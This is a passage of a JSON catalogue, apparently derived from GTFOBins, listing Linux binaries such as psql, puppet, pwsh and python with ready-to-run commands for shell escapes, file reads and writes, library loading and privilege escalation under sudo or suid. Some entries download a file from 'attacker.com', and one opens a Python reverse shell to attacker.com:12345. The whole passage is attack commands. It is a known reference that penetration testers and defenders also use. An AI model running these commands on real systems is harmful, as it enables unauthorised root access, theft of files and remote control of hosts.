Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >/path/to/temp-file\npoetry run python /path/to/temp-file","description":"This allows to run Python code (`...`).\n\nA valid `pyproject.toml` file must be present in the current working directory, you can create one with `poetry init -n`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/poetry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:posh:shell:0:sudo","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/posh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:posh:shell:0:unprivileged","toolId":"gtfo:posh","toolName":"posh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"posh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/posh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:sudo","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:suid","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pr:file-read:0:unprivileged","toolId":"gtfo:pr","toolName":"pr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pr -T /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:procmail:command:0:sudo","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/procmail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:procmail:command:0:unprivileged","toolId":"gtfo:procmail","toolName":"procmail","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e ':0\\n| /path/to/command >/path/to/temp-file\nprocmail -m /path/to/temp-file","description":"The program is picky about the file ownership, and waits for some input.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/procmail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pry:inherit:0:sudo","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pry:inherit:0:unprivileged","toolId":"gtfo:pry","toolName":"pry","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"pry","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pry/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:sudo","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:suid","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psftp:shell:0:unprivileged","toolId":"gtfo:psftp","toolName":"psftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:inherit:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"psql\n\\?","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:sudo","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:suid","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:psql:shell:0:unprivileged","toolId":"gtfo:psql","toolName":"psql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"psql\n\\! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/psql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:sudo","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:suid","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ptx:file-read:0:unprivileged","toolId":"gtfo:ptx","toolName":"ptx","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ptx -w 999 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ptx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-read:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-read:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"puppet filebucket -l diff /dev/null /path/to/input-file","description":"The read file content is corrupted by the `diff` output format. The actual `diff` command is executed.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-write:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:file-write:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"puppet apply -e 'file { \"/path/to/output-file\": content => \"DATA\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:shell:0:sudo","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:puppet:shell:0:unprivileged","toolId":"gtfo:puppet","toolName":"puppet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"puppet apply -e \"exec { '/bin/sh <$(tty) >$(tty) 2>$(tty)': }\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/puppet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:file-write:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:file-write:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"pwsh -c '\"DATA\" | Out-File /path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:shell:0:sudo","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pwsh:shell:0:unprivileged","toolId":"gtfo:pwsh","toolName":"pwsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"pwsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pwsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pygmentize:file-read:0:sudo","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pygmentize:file-read:0:unprivileged","toolId":"gtfo:pygmentize","toolName":"pygmentize","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pygmentize -l text /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:0:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:0:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright /path/to/input-file","description":"Content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:1:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:1:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright --outputjson /path/to/input-file","description":"Content is leaked as error messages in JSON format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:2:sudo","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:pyright:file-read:2:unprivileged","toolId":"gtfo:pyright","toolName":"pyright","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pyright -w /path/to/input-dir/","description":"Recursively walks directories, parsing all Python files and leaking some contents through diagnostics.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pyright/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:sudo","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:suid","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:download:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"python -c 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-read:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"python -c 'print(open(\"/path/to/input-file\").read())'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:sudo","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:suid","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:file-write:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"python -c 'open(\"/path/to/output-file\",\"w+\").write(\"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:sudo","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:suid","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:library-load:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"python -c 'from ctypes import cdll; cdll.LoadLibrary(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"attacker.com\",12345))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:reverse-shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"python -c 'import 